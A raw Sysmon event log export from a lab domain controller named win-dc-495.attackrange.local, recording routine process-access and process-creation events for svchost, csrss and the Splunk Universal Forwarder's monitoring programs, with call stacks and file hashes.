13:56:44.652{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009473Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:44.652{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009472Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:56:44.652{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009471Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:44.652{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009470Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:56:44.652{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009469Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:44.652{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009468Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:44.652{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-939C-6005-D704-00000000A301}4876C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009467Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:44.652{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-939C-6005-D704-00000000A301}4876C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009466Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:44.652{59A5CD1D-939C-6005-D704-00000000A301}4876C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009492Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:45.652{59A5CD1D-939D-6005-D804-00000000A301}36244768C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009491Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:45.527{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-939D-6005-D804-00000000A301}3624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009490Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:56:45.527{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009489Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:45.527{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009488Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:56:45.527{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009487Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:45.527{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009486Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:56:45.527{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009485Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:45.527{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009484Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:56:45.527{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009483Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:45.527{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009482Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:56:45.527{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009481Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:45.527{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-939D-6005-D804-00000000A301}3624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009480Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:45.527{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-939D-6005-D804-00000000A301}3624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009479Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:45.527{59A5CD1D-939D-6005-D804-00000000A301}3624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009505Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:46.027{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-939E-6005-D904-00000000A301}2356C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000009504Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:46.027{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009503Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:46.027{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009502Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
